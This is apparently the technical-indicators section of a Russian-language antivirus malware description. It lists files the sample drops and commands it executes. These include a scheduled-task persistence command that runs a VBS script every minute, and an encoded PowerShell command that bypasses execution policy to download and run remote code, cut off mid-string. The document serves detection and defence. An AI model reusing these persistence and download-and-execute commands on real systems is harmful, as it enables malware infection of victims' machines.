Техническая информация
- %WINDIR%\Tasks\w2k18.job
- %WINDIR%\Temp\windllx86.vbs
- '<SYSTEM32>\wscript.exe' "%WINDIR%\temp\windllx86.vbs"
- '<Полный путь к файлу>' hu3hu3
- '<SYSTEM32>\cmd.exe' /C "schtasks /create /sc minute /mo 1 /tn w2k18 /tr '%WINDIR%\temp\windllx86.vbs'"
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn w2k18 /tr '%WINDIR%\temp\windllx86.vbs'
- '<SYSTEM32>\cmd.exe' /C %WINDIR%\temp\windllx86.vbs
- '<SYSTEM32>\cmd.exe' /C "powershell.exe -nop -ep bypass -ec JABpAHMAIAA9ACAASQBFAFgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKA...